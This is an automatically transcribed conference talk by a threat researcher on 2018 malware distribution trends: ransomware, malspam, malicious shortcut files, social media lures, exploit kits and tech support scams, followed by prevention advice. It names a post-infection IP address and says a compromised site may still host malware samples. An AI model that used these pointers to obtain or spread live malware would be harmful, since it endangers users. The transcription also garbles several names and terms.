BSides Iowa 2018: "Malware Distribution Trends – April 2018"

all right good morning everyone my name is Brad Duncan I worked for Palo Alto Networks unit 42 and I'm here to talk to you about malware distribution trends a little about myself I've run the for those that don't know I run the malware traffic analysis dotnet web site plenty of examples of infection traffic from malware and actual malware samples if you're actually going to get copies of the malware from the site beware this is live stuff and you don't want to accidentally detonate it on some windows host that you're using and I also tweet quite frequently at malware underscore traffic usually just the stuff that I'm posting on the blog occasionally I'll tweet about something

like b-sides I were going on today and then every once in a while just some really off-the-wall joke that makes you think I'm socially disclaimer on this I run into a lot of commodity malware stuff that's not apt stuff that's not specifically targeted that's kind of a different era area that we're looking at here what I'm discussing is the stuff that is mass distribution the stuff that goes out indiscriminately that's not really necessarily targeted that's weird okay that's not necessarily targeted but you could very well get it if we're talking malicious spam a lot of this stuff gets hit by your you know through the spam filters which we'll never see it now the spam filters are

definitely a good way to get malware samples that would otherwise hit your organization and if you've got access to that if you actually work a security job where you have access to emails and the spam q check through it you might be surprised there there's some good stuff through there but the stuff I'm going to talk about hopefully all limited to early April 2018 so hopefully it's timely things can and do quickly change for example two months ago at besides Tampa I gave a talk on how ransomware was really on the on the downturn there was a serious and there still kind of is a serious lower levels of ransomware at that time this year

then there was a time before then it was like it couldn't get away from ransomware but now as we go into April I'm seeing a lot more ransomware than I was seeing in January of this year so things can and they do quickly change and personal bias like I said I tend to look at the commodity stuff and they're definitely that's only part of the picture when you're talking about a specific malware threat to your to yourself or your organization so for today's talk we're going to look at the types of malware distribution methods I'm gonna go over tech support scams briefly those fake antivirus alerts that come up through your web browser because we're seeing a lot more of those now

than we did about a year ago and prevention strategies what you guys can do to help prevent getting caught by malware so in wide scale distribution we most often find information stealers and back doors the sneaky malware that you don't know is running on your computer malware downloaders that can download any one of those types of malware x' cryptocurrency miners are a big thing that has really taken off in the past few months and ransomware so what do you guys think it's the most press coverage out of all those four categories that I have up there yeah now if I had a explosion sound effect they put it there with this particular graphic because ransomware is

a very relatable story on a human level you've got stuff and some criminals are holding it for ransom that that speaks to everybody however it tends to the very nature of news stories you want to get a hook to grab somebody's attention right so you're going to kind of play it to try and hook a readers interest and so my personal opinion is that we tend to play up ransomware in the open media a lot more than it is you know as far as the thread is concerned there are other things out there that you should also be worried about but the press generally tends to focus on ransomware because it's a good story well we all know about ransomware I

think by this point everybody knows what ransomware is you you know get it through your browsing the web or you get an email and you're a faceless white couple with a computer and you have to pay money to a faceless criminal that is for some reason still wearing a mask so it's it's a fairly standard I think we all know what ransomware is by now so we've seen a lot of high profile stories in the past couple of years the most recent one was in March the city of Atlanta got hit by ransomware they didn't specify what type it was I think they're they think it's Sam Sam or Sam so ransomware and just earlier this

week one of the reporters at WS TB TV and it w SB TV in Atlanta reported that they shelled out nearly 2.7 million dollars as a way to you know following the ransomware incident that probably has a lot more to deal with than just the ransomware I'm sure there was some endemic system problems in the city of Atlanta and you know it's a good number to throw out there once again it's a hook to catch your interest if you actually look at the details how much of that is specifically going to the ransomware case it's a good question the Department of Health and Human Services so far this year at least eight cyber attacks employing Sam Sam or Sam so

ransom they reported that have targeted healthcare and government organizations in this case it really is targeted because with Sam Sam or Sampson ransomware your point of entry as a server so you're trying to find a vulnerable server that you can exploit through automation so if you have a server exposed to the internet and you're not fully patched or fully up-to-date there's a vulnerability you can you can imagine that it will sooner or later be exploited and if you're the city of Atlanta or one of the other organizations commercial or government that have been hit in the past few years by ransomware it is because generally because you didn't have your servers fully patched and up to date

now bitcoin is the general payment that we have that we see for ransomware and if you look at the price in 2017 there were some wild fluctuations for longest time Bitcoin was generally lower than $1,000 per per Bitcoin the exchange rate and as the year went on the last few months of last year it really shot up it was very volatile the prices so that is probably one of the reasons that we saw a decline in ransomware there just was no stability and saying okay send me this amount of Bitcoin because a day or two later the Bitcoin value will have fluctuated so rapidly that you're either getting far less than you originally asked for or far more depending on the

day fortunately since as we've gone into 2018 it's kind of stabilized and it was funny when I see that you know reports of Bitcoin that has dropped to like six thousand dollars for US dollars per Bitcoin they say it's a crash I'm thinking for the longest time Bitcoin wasn't even approaching that level yes sir and so it's correct the question here was when I was talking mentioned earlier about servers exposed to the Internet which a that it's not necessarily spearfishing that it's not necessarily some of the other methods that these organizations that we hear about that have gotten infected with ransomware and I said generally for the most part that's not to say that that

that that is the only vector and I'll get into that here in a few minutes so it's just that and it's not something I go into the great detail here because I don't have examples of that if you're an organization and you have a server that gets compromised you're you're generally not going to share all that infirmity tales on how it got compromised out with the general public so it's a it really is kind of hard to get more detailed information on that I can tell you about you know spear fishing or just fishing in general you can get examples of that fairly easily one of the types of malware that propagates that will that

we'll see a lot of we first saw this happen last year in the spring or summer was when wanna cry or when a krypter came out and it's has been reported as spreading during via SMB the SMB protocol Microsoft's SMB protocol through what is called the eternal blue exploit which is when the hacking team was a hacked one of their I'm sorry not the acting team it's I believe the NSA exploit right so somehow the criminals had gotten a hold of that and we're we're able to implement it into this ransomware now the interesting thing about one a cry is while it was big news last year when we first saw it we're definitely still seeing samples of

that on a daily basis so as a researcher of Palo Alto Networks I've got access to virustotal intelligence which apparently if your your company is not paying for it is very expensive so I'm fortunate enough to look through that and I can actually search through there on anything with want to cry in the description or the virustotal detections on the antivirus vendors and anything that is first seen since April first so when I look through that seam they stopped counting at a thousand so more than a thousand samples new file hashes that have come through here I'm not sure what's been tweaked but we're seeing stuff that is at least identified by some of the antivirus vendors as one a

cry and just looking at the general size and the types of files it seems to fall in line with what I've seen before now also as a my employer has to call autofocus and as a security researcher I got access to that and I can look at the same thing in this case I'm looking at anything that we have tagged as some sort of ransomware and I'm pulling for anything that was first seen after April 1st at 12 a.m. 26,000 samples that we're seeing of ransomware so it is really a lot more now than we saw back in January which is I think less than half that so the samples that are tagged want to cry

of one equipped er that we have identified a Palo Alto Networks 2500 and then again crab honeybee how many people have not heard of gang crap at this point and I'll go through that here momentarily and then Gann crab is a new family of ransomware that started appearing back in January but the majority of ransomware samples not the vast majority but just the majority over half of that is one a Corrupter Organa crab now gand crab is interesting again crab when it encrypts your files it adds dot crab is a file extension and gand is slang in India for but I believe so I tend to refer it personally as but crab ransomware but everybody else calls

at gain crab but so you infect a host which I did on Thursday evening and all the encrypted files are appended with dot crab it throws up the decryption instructions and it throws up a window to tor so you can download the tor browser because everything if you had the tor browser installed it it sitting on your desktop it was encrypted so $1,500 us and the interesting thing about gain crab when it asks for that money is that it asks you to pay for it in a cryptocurrency called - now - is and that was a big news when it came out it was like okay there's a big move away from Bitcoin everybody's moving to - now

you know there was one only one family of ransomware to my knowledge that uses - specifically as a crypto currency for your ransom payment and so three hundred and fifty dollars for one - and one thousand five hundred dollars now you can still pay in Bitcoin all right you can pay in Bitcoin but you've got a 15% service charge so you're paying what is it 1,650 dollars I'm sorry that's 10% but anyway you're paying about $1,700 or so so ultimately ransomware is still out there and it is doing a little bit of an uptick since I saw this law back in December in January an interesting thing here is yesterday yesterday afternoon this week and

ransomware was reporting about a ransomware called thug B or pub G made you play players on a non-magical battleground in order to decrypt your files it's a joke a joke ransomware I always find those interesting but even with the media attention on ransomware we still see the vast majority of stuff that we run across is not ransomware is information stealers is malware downloaders and cryptocurrency miners which were largely reported the beginning of the year and now our fairly commonplace we still see them I generally don't run into them much on the mass distribution side on the stuff that I end up looking at but how does malware get from the criminal to us email the web social media and attackers

breach networks or servers and drop the malware I'm not going to talk about that fourth one because as I explained earlier I generally don't have any of the technical details of the information on that stuff social media I've got a story that I'll share with you but mostly we're we're looking at email in the web for mass distribution of malware not apt style attacks and email is the most common method hands down that criminals used to distribute malware by volume it doesn't mean that the email actually makes it to the intended recipients but for example how many people for like their Gmail or Yahoo or whatever you use and do you get the pill spam you know viagra cialis for

some reason that stuff just gets to you that just means that your email is on a list all right your email is on the list and it gets spread around and so if your email is on a list and it's spread around to the pharmaceutical spammers it could very well end up in the hands of people that are actually trying to send malware out there if you got a gmail account you will probably probably not see any actual or malware because they generally have a good way of a good method of filtering filtering for malware we got Yahoo maybe a little less so we got AOL god help you so these emails contain archives with malware

executables which is very common and very easily blocked microsoft office documents Word PowerPoint Excel rich text files that exploit Microsoft Office is a big thing that we started seeing a couple years back and a significant percentage not a definitely not of majority by far but a significant percentage of the stuff that I see out there is some type of RTF attachment to emails or a link to an RTF document that will exploit a vulnerability in Microsoft Office normally these have been patched why don't you know for months but these guys are still sending out these emails in the hopes of capturing some unpatched Windows XP machine or something another favorite is archives with any of those

file types so for example Java archives so you've got a jar file and you double-click it and it does its thing it's backdoors your computer using Java and then there are just as often links to malware right so you got to you know show an example here but you you have an email that says you know look at this invoice click here you go there and download the file and then you open it and it's a it's a decoy and you're infected so my favorite one of the link type malware's is campaigns mal spam campaigns is what's called hinder or channet ur or portal this is a malware that uses macros in a Word document to infect your

computer and macros is pretty common because you're you're trusting the user to a average users inclination to click through warnings to get to what they want to see I'm not talking about anybody here in this room or hopefully anybody watching the video here I'm talking about the general user and I think we all know a few of them and have run into a I had one guy tell me you know me I'm a clicker guy but so this was back on Wednesday of this previous week from the Hanson or campaign you got a link and there are a number of domains that they'll have there and so you got in this case one six six four six comm

question mark there's a string of characters equals another string of characters and that second string of characters is it represents it an encoding that I haven't figured out yet and nobody I've talked to is quite figured out yet is encoding it represents the recipient's email address so if you click on that link the server that sends you the mount where it also records okay this is the email address of whoever you know click that link so they're actually keeping track of who downloads there there we're but yeah you you click on the link and says hey here's your invoice and there's a number of templates that they'll use in these documents that basically tell you

hey in order to view the content you know enable macros and here's how you do it because by default Microsoft Office will not enable macros however you know certain people organisations may have disabled that in which case these directions are pretty much meaningless but for most people you'll see some sort of of message that says hey enable your macros and see the content and of course you don't see the content you don't see it at all it just has the same messaging you figure well ok I'll close it but you're getting infected behind the scenes the old macros have been disabled and every once in a while you'll get you'll get a link or you'll get an

attachment that says it's a document it's actually a rich text file with some support code and usually these are exploiting things that have already been patched with Microsoft Office so for example if you're running Windows 10 and you got a good set up to where you know you're getting those patches whether you want them or not with Windows 10 you're getting patched for Microsoft Office and the various operating system components that they've found vulnerabilities and but these are the general CBE's that I'm seeing for the vulnerabilities that are being exploited by these Word documents at least according to virustotal when they tag them there's a what is it the Microsoft equation editor vulnerability that's a 20-18 CVE but I always forget

what that is because people don't call it by the CVE they called the equation editor vulnerability be consistent for crying out loud here's another one from earlier this week this one I believe is Brazilian mouth spam and so it has a zip archive attachment and that zip archive attachment is whatsapp except the misspelled what's app if you notice right there so you know that generally is a red flag if you will another red flag when you open that archive open that zip file you get something that's not VBS now what is the default setting for file extensions for windows yeah you hide them so at best people are going to see in the default configuration that

are going to see dot PDF and they'll think even though the icon is clearly not a PDF icon they'll double click it and if you look at the code it's highly office gated JavaScript code and it will download malware I forget what the case was in this instance but I just need an example for today's presentation on that type of malware that type of distribution method which I see quite frequently I just didn't have any easy examples from this past week however I did find some examples of mal spam pushing gand crab ransomware I'm sorry this is not gang crab this is a difference from the knickers botnet campaign which is a very long running campaign that uses various

methods so in this case and this way from earlier this month the cinders were all spoofed so after the ad sign was your recipients email domain right so if you're you know if this went to somebody at Palo Alto networks and somehow made it to the recipient it would be Emily 2018 at Palo Alto Networks komm photo from Emily photo from Lea the attachment names are all some sort of supposed image and if you look at these emails and this is common for the nickers botnet is they will have a very standard template or in this case no matches message text at all it was kind of weird so you open this up and you find that

it's an actual URL file now the interesting thing about URL files if you look at them in Microsoft Windows it doesn't even give you the option of looking at the file extension no matter what your settings are you're not seeing that dot URL you're just seeing that Sh 20:18 no 404 or BBD baa so the certainly the average person who is looking at this on Microsoft Windows is not going to see the the code inside and not going to understand that this is actually a URL that will point to somewhere on the internet now if you look here the URL is not HTTP for web traffic its file colon backslash backslash so what protocol is that SMB

you're right what port 445 TCP port 445 so that is generally what you're going to see and the interesting thing about this is I checked on Thursday night when I was putting the finishing touches on this show and I went in Windows host in my lab environment I was able to find those VBS files sitting on the server 60 of them 60 of them in that directory in the stream directory there's another one on the server and if you guys are curious you could if you've got a Windows host you want to check it out yeah you can find 60 examples of malware probably right now as I'm speaking if you're watching the video probably

hopefully it'll be offline that so I went through and most of the follow-up domains because basically you've got that URL file it's pulling the VBS file from a server over SMB and then you run that VBS file and it will again grab through HTTP the actual malware binary so I checked a few of them out on Thursday night and you know no luck no luck no like wait here's one and so taxi heavy Cu is a site that's a legitimate but compromised from what I can tell and it was hosting malware as of Thursday evening when I checked so I think if anybody wants to grab a copy of the malware you might still be able to

do it by using that URL so I ran this in my test environment I got a post infection traffic ninety two point fifty three point seventy seven point one eighty four port 80 HTTP post infection traffic - RORO double dot I am and the characteristics of this traffic were matched Quandt loader which is what the nickers botnet was pushing now Quandt loader is just a malware downloader backdoors into your computer and will download some additional mat work and know it's a couple letters changed it's not quite loaded it's squanch loader at least that's what they call it on planet squanch ultimately there are many different files types of files used by criminals to install malware and

malicious spam with links is harder to to catch by intrusion detection systems across the board at least that's been my experience it's a lot easier if you got that malware in the email you can generally block it if you just got a link to something it's a little harder and sometimes that will slip past systems and some types of malware have defense systems that will act differently if you're analyzing so if it knows it's being analyzed now I've been tricked by this before because especially if I'm on the road I'll generally use my laptop and one of my environments is VMware and I run one time but got caught by the malware is called be tip which I don't see anymore

but I was seeing a lot last year and it actually acted differently in most cases the malware just won't run if it detects it's being analyzed but in some cases like in the case of B DEP last year I was getting completely different traffic so it really threw me off so you got to be careful of that distribution through social media how many people here do not have any sort of social media account whoo one two three Lord you guys had the outliers it is social media generally like email you'll generally see what's called what I tend to think of as mass distribution but well with a lot of social media platforms you got to somehow connect

with somebody you can't just spam stuff out there like you can through email right so in the case of Skype you have to be connected to somebody on skype before they can send you something that's a link to malware in which case it's pretty common it generally tends to be female names I'm sure the criminals are not female or they could be I don't want to be sexist but you'll get something usually something like hey here's a picture of me I do I okay or I just got a new hairdo or or something that is just so vastly stereotypical baiting to click a link you know for for some lonely lonely guy I guess and nope I'm sorry that wasn't mine my

bad so in this case once again the default for Windows is to hide the file extensions so you're not going to see that SCR which is a screen saver which basically is just another executable right and this isn't even a screensaver this is a this is just a executable file with the dot SCR file extension that's hidden on the default settings and windows so you double collect that what we're saying where's my picture how am I gonna know if her hairstyle is better or not I don't even know the woman she just friended me an hour ago but with social media because you've got to connect with people somehow generally social media tends to be a little more targeted than

regular mass distribution methods and so I've got a interesting story about this back in 2016 in August 2016 when we were seeing a lot of ransomware there was a lot of news coverage that was just annoying me and served to your point earlier there was some hospitals that got hit by I think it was lucky ransomware and which is doesn't is isn't in the scene now but that is generally spread through emails and I believe in one article they had mentioned something like a spray-and-pray attack right well they sprayed out there and I'm thinking it's not an attack right you've got you got hit with ransomware because you were unaware enough to to double click on a

link it was something that you did it's not something that the criminal did any differently it's something that you did different well you did unknowingly unaware so I was saying stop calling it ransomware attack start calling it an incident because in cybersecurity in this field the word incident has serious connotations however for a lot of people that think an incident it's just something that happens so I got a lot of blowback from this I got a lot of comments and one of the comments was from somebody that tagged themselves as Sarah the enthusiast who wrote a very well reasoned response that I thought and said that that and you know this is the Internet so I don't know if this

person is actually named Sarah or not but he or she or he whoever it is said that I think this type of malware is becoming so increasingly popular that even the careful list careful Internet users can be tricked into downloading and opening a link so this person was the victim of a ransomware attack two days before she or he wrote this and the hoax was so elaborate because this person thought there was so much trouble that they went to to get her to download and click this file so long the short story is Sarah the enthusiast is a freelance writer got contacted about a writing assignment on freelancer comm as part of the process connected with a

Skype account of a person that she researched and thought okay this is legitimate Skype account and it was but it was compromised it was being used by criminal to rope in people right so Sarah Lee enthusiast is thinking oh that's a lot of effort to get me to click on something but I'm sure the person who had compromised this Skype account was trying to fool more than one person right so as part of the process Sarah the enthusiast gets a bunch of files PDF files company guidelines the the writing assignment guidelines and something that's an exe file now Sara's no dummy so Sara actually not realizing that the Skype account was compromised contacts the Skype account

and says hey I see this is a malware I'm sorry this isn't executable this is kind of weird you're not trying to infect me are you haha and of course the criminal behind the Skype account said hey this is just part of a new new format that we're using and so Sara the enthusiasts double clicked on that executable and got infected with ransomware and I say this luckily got infected with ransomware because it could be far worse could be an information steal it could be a banking Trojan which in my personal opinion is worse because they're able to steal all your passwords if this is a straightforward ransom or all they're doing is encrypting files on your

machine however you do have to make the assumption that oh they're probably if they infected my machine they could very well have taken my passwords and login account credentials but I'd like to share that story because how many of us in this room think that you know it'd just be too much trouble for somebody to target us in that fashion now understanding it's not really necessarily targeting but going through a bunch of work to get us to click double click in a Windows environment on an executable file we probably don't think we're that important but we don't have to be as long as you can scale your operations up any one of us can be a

target of those criminals as long as they can scale their operations up so for distributing malware through the web there are generally two types of methods there are the unexpected webpages or pop-up windows all right in that case you actually have to do something to to click or install something to be infected and then there are exploit kits which are I gave a talk about exploit kits here besides Iowa last year and had mentioned then they were on the wane and that certainly has held true so here's an example of a campaign that I had seen and I'd documented on my blog just some technical some peak apps and some malware samples and malwarebytes actually did a good write-up on this

relatively recently I forget exactly what they called it but so in this case you got a compromised website and there has injected code and it redirects you to to this fake Flash Player if you use an Internet Explorer and of course you'll get plenty of warnings that this type of file is not something you want to double-click but you know me I'm a clicker you look at the code of the file that you download it's highly obfuscated javascript in this case run by Windows scripting host and it's designed to check your computer and I never was able to infect a host in a virtual environment with this I actually had to go through a physical environment

because it had some checks that were making sure that whoever double-click that file was not was not in a virtual environment if you're running Chrome you'll actually from the hitting the same website and going through the same process you won't have flash because Crump doesn't use flash so you get the same same type of file different file name using Firefox says hey you're using an older version of Firefox even though I wasn't and then it tells it gives you the same type of file now when I first tried this out all of those file names are the same exact file hash however about a couple weeks later when I checked it again they were all different

file hashes slightly different and it is relatively easy for criminals when they're doing stuff when they're compiling their malware it's easy to kind of put a little bit of randomize the process just enough to add a couple spaces here a couple of characters there and make your file hash different which is why earlier when I was saying that Palo Alto Networks on that query that I didn't know my company tool though I saw 26 thousand more than 26 thousand samples of ransomware you know that just means 26 thousand different file hashes a lot of those were pretty much the same thing just every single time you downloaded it it was a new file hash but it did the same

exact thing but exploit kids which once again I did talk about here last year is a way to infect your computer behind the scenes so basically you're just doing regular web browsing and you hit a in most cases nowadays that's ad traffic some banner ad has some injected code it directs you to a to a exploit kit server behind the scene and it will send code it will check to see if your browser based components are invulnerable and infect your computer here is a my standard definition for excellent kids the web servers that use exploits to take vulnerabilities and browser based applications right so it has to be a browser-based application so if you're using Java if you're using flash if you

use an Internet Explorer does anybody still using Internet Explorer

I'm not saying it doesn't happen is anybody by choice using internet but so interestingly enough Java and PDF those are big 2010 called they want their exploits back and you just don't see this stuff as much anymore Flash Player is generally the only Flash Player and Internet Explorer are the two that generally get exploited by what remains in the exploit kids scene and this is literally what you're talking about as far as the infection chain you've got a normal website this could be CNN this could be the New York Times this could be any high profile web site that buys ad traffic and I should say that that gets paid to air at traffic and then the

banner ads which are not as as thoroughly vetted as content on the site itself actually has the stuff you'll have a gate it's just another server that kind of keeps an eye on things and you know tries to make sure that you're not coming from the same ip address multiple times you know your security researcher or something like that it's a good way to avoid it but exploit kids are really on the wane so when I talked about it in April of last year we had seen markedly lower levels than the year before and now it's probably about a tenth of that now now I have never been able to use any of the current exploit

kits to infect a Windows 10 host even even running Internet Explorer which you can do on Windows 10 Microsoft edge and I know it can be done I know it has been done I just personally haven't been able to do it and good guide Chrome it's they really keep on top of things as far as making sure that exploit kits tile infections where it's happening behind the scenes without your knowledge is not happening right --chrome will still happily let you you know pop up those windows and say hey install this Chrome update because your Chrome is out of date but X what kits are because of that you know many people use groan and yeah

that sort of stuff is on the wane so in addition to malware what some criminals have done is instead of directing you to download and install a fake flash update or something they'll say hey you've got your computer is infected so while you you get on one of these and it happens the same way it's the same chain instead of going to an exploit kit you're basically going to a page that has this faked update and you can't close your browser unless you go your task manager and you kill that particular process so it's easy enough to get out of there every once in a while my wife will run across these I'm like you got to stop

browsing to these to these gambling sites she doesn't gamble I'm just kidding honey so that I'm sorry you know this this is in chrome right so chrome doesn't stop this sort of stuff in generally I say chrome doesn't stop this sort of stuff but in my lab environment I specifically you know change the settings in chrome so it isn't blocking suspicious websites so I I revised that my environment doesn't block those so if you go to Windows that the same thing you get a slightly different looking thing with Internet Explorer and you'll get a window that pops up you'll try and close the window and it will not close it will just pop back up and once again

you got to go into task manager to to kill that process if you're going at the same website through Firefox it will actually ask you for username and password I'm astounded why would nono but anyway if anybody feels curious enough it's not going to hurt your computer it's just going to lock your browser up and you'll have to kill that process you could probably go to this URL right now if you're curious once again for the official record I don't recommend it prevention strategies how do we stop this stuff from getting to us or for the people that we are responsible for protecting not really a prevention strategy you're talking about regular backups so if you do get hit and this

this could be ransomware but any type of decent disaster recovery plan because you could get hit by a tornado here in Iowa and you can lose all your stuff if you don't have your stuff your your critical data backed up you'll never recover it whether it's ransomware or whether it's some other sort of disaster Apache systems keep your systems patched and up-to-date as far as the software now this is kind of common sense and for the home user we generally don't have to worry about that but sometimes in an enterprise environment you're still forced to use Internet Explorer or you know use a now to date version of Java you know because a particular mission

critical application requires it training and awareness if you don't understand the types of threats you face if you don't know what a phishing email is you'll probably click on it and be tricked so how many people have been fished by your company to test and see if you recognize it it's kind of common there they're a good ways of doing it there are bad ways the bad way is to make you feel like an idiot if you actually click the link and that's not what it's all about it's about trying to raise your awareness browsing restrictions if you like porn if you like online gambling you even like illegal file sharing and you to the internet for that stuff you're

probably going to run into some shady websites that may direct you to malware so if you restrict yourself from browsing that stuff you'll be much much better situation if you're in a company and you've got some sort of web filtering you would hopefully be filtering out at least those three categories of web traffic and then security solutions so if you are if you're not looking at what's happening in your network you will never know if you have been compromised or in some cases when you were compromised and it's pretty much it we've covered the types of malware distributional methods tech support scams and prevention strategies and I'm not going to waste time here with questions however I will be around if

anybody does have any questions afterwards I'll be more than happy to answer them thank you very much [Applause]